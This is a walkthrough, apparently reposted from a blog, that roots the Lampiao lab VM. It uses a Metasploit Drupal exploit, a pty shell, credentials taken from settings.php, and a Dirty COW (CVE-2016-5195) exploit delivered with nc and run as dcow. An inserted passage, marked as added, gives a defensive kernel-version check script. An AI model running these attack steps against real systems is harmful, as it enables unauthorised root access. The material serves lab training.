Lampiao Dirty COW Privilege Escalation (CVE-2016-5195)

Introduction

Vulnerability number: CVE-2016-5195

Vulnerability name: Dirty COW privilege escalation

Vulnerability hazard: Low-privileged users can exploit this vulnerability to achieve local privilege escalation on all versions of Linux systems and obtain root privileges.

Scope of impact: Linux kernels >= 2.6.22 (released in 2007) have been affected; the flaw was not fixed until October 18, 2016.

Link: Target VM download address, extraction code
Link: Privilege escalation file download address, privilege escalation code zp3j

Information gathering

ifconfig #Check the local IP address

nmap -sP 192.168.152.0/24 #Scan the network segment to find the target VM's address

nmap -A 192.168.152.129 -p 0-65535 #Scan the ports

Open http://[ip]:1898 in a browser. If the page appears, the target VM has started successfully.

dirb [website address] #Scan the directories

We check robots.txt to see whether there are exploitable vulnerabilities.

The website contains Drupal version information. We use msfconsole to check whether there are exploitable vulnerabilities.

Vulnerability reproduction

msfconsole #Search for exploitable vulnerabilities
search drupal #Query vulnerabilities
use 1 #Select the entry with serial number 1
show options #View the options that need to be set; use set to set them
set RHOSTS [target VM address]
set RPORT [target VM port]
run #Run and discover vulnerabilities
shell #Interact
python -c 'import pty; pty.spawn("/bin/bash")' #Use Python for an interactive shell

cat settings.php #View the contents and get the account and password of the database
cd /home #Enter the /home directory and view existing accounts

Connect over SSH with account tiago, password Virgulino, port 22. The connection is successful.
id #View the current user information
uname -a #View the kernel version of the target machine
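
A defender-side companion to the uname -a step and to the affected range given in the introduction (kernel >= 2.6.22, fixed October 18, 2016): this added example, which is not part of the original post, classifies a kernel release string against that range. The function names and sample strings are assumptions made here; the upstream fixed releases 4.8.3, 4.7.9 and 4.4.26 are not from the page, and distribution kernels that backport the fix still show as in range, so read that result as "check the vendor advisory".

```shell
#!/bin/sh
# Added example: triage a kernel release string for CVE-2016-5195 (Dirty COW).
# Only the version number is inspected; vendor backports are not visible here.

# ver_num RELEASE: print major*1000000 + minor*1000 + patch for comparison.
# Runs in a subshell so the IFS change does not leak to the caller.
ver_num() (
    v=${1%%[!0-9.]*}      # "4.4.0-31-generic" -> "4.4.0"
    IFS=.
    set -- $v             # split into numeric fields
    echo $(( ${1:-0} * 1000000 + ${2:-0} * 1000 + ${3:-0} ))
)

# dirtycow_status RELEASE: print one of
#   not-affected-pre-2.6.22 | in-affected-range | fixed-upstream
dirtycow_status() {
    base=${1%%[!0-9.]*}
    n=$(ver_num "$1")
    if [ "$n" -lt "$(ver_num 2.6.22)" ]; then
        echo "not-affected-pre-2.6.22"
        return
    fi
    # First upstream release carrying the fix, per stable branch (assumption:
    # only the 4.4, 4.7 and 4.8+ branches are modelled; any other branch is
    # reported as in range until it reaches 4.8.3).
    case "$base" in
        4.4|4.4.*) fix=4.4.26 ;;
        4.7|4.7.*) fix=4.7.9 ;;
        *)         fix=4.8.3 ;;
    esac
    if [ "$n" -ge "$(ver_num "$fix")" ]; then
        echo "fixed-upstream"
    else
        echo "in-affected-range"
    fi
}

# Constructed sample release strings (not taken from the target in this post).
# On a real host, pass "$(uname -r)" instead.
for rel in 2.6.18-398.el5 3.13.0-24-generic 4.4.0-31-generic 4.4.26 5.15.0-91-generic; do
    printf '%-22s %s\n' "$rel" "$(dirtycow_status "$rel")"
done
```

An in-affected-range result on a distribution kernel is a prompt to compare the installed package against the vendor's CVE-2016-5195 advisory, not proof that the host is exploitable.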

Dirty COW Privilege Escalation

Script link: Download address of privilege escalation file, privilege escalation code zp3j

On Kali, compress the file. The compressed file is named aa.tar.gz and needs to be passed to the target machine to perform privilege escalation.
tar -czvf aa.tar.gz CVE-2016-5195-master

The target machine listens on port 4444 for the aa.tar.gz file.
nc -l 4444 > aa.tar.gz

Kali transfers the aa.tar.gz file to the target machine.
nc 192.168.152.129 4444 < aa.tar.gz

The target machine decompresses the transferred aa.tar.gz.
tar -xzvf aa.tar.gz

cd CVE-2016-5195-master #Enter CVE-2016-5195-master
make #A new file, dcow, appears
./dcow

The root password is dirtyCowFun.
su #Enter su; the privilege escalation is successful.

Origin blog.csdn.net/m0_64118193/article/details/126610051